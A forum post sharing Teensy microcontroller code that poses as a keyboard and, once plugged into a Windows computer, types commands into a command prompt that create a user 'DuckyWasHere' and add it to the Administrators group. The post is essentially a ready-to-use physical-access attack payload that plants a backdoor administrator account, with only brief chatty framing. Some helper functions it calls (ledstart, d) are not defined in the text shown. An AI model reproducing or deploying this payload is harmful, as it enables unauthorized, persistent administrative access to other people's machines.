[Version 1] [code][windows] Create New Admin Account In Windows.

Here's another version of w02057's Ducky Script. I'm still learning this whole coding thing, so bear with me. I'm not sure what his code was written in (C??) so I just remade it. There's still no minimizing of the command prompt, but the window doesn't stay open for very long anyway. Feel free to contribute. Credit goes to w02057 tho. :)

Oh, and can someone tell me what kind of code is below??

// DUCKY_WAS_HERE - Teensy
// Based on w02057's Ducky script (Pretty much the exact same thing) - 5/7/2010 - 3:30PM

int ledPin = 11;

void setup() {

pinMode(ledPin, OUTPUT); // put this before other led commands or the LED will be dim

ledstart(); // lights up when connected
delay(3000); // delay for computer
ledstart(); // lights up when payload starts
Keyboard.set_modifier(MODIFIERKEY_GUI);
Keyboard.send_now();
Keyboard.set_key1(KEY_R);
Keyboard.send_now();
Keyboard.set_key2(0);
Keyboard.send_now();
d(); // this is a 100ms delay, see below for commands.
Keyboard.print("cmd"); // Opens cmd prompt
d();
enter();
delay(1000); // delay for prompt to load
Keyboard.print("net user DuckyWasHere quackquack /add"); //First command (Username/Password)
Keyboard.send_now();
enter();
d();
Keyboard.print("net localgroup Administrators DuckyWasHere /add"); //Second command
Keyboard.send_now();
enter();
d();
Keyboard.print("exit"); //Exit cmd
Keyboard.send_now();
enter();
d();
}

void loop() {
  // Maybe a flashing LED?
}

void enter() {
  Keyboard.set_key1(KEY_ENTER);
  Keyboard.send_now();
  Keyboard.set_key1(0);
  Keyboard.send_now();
}

void sendClearKeys() {
  Keyboard.send_now();
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
}

// LED command for end of script.
void ledend(){

Keyboard.set_key1(0);
Keyboard.set_key2(0);
Keyboard.set_modifier(0);
Keyboard.send_now();

digitalWrite(ledPin, HIGH);
delay (500);
digitalWrite(ledPin, LOW);
delay (500);
delay (500);
}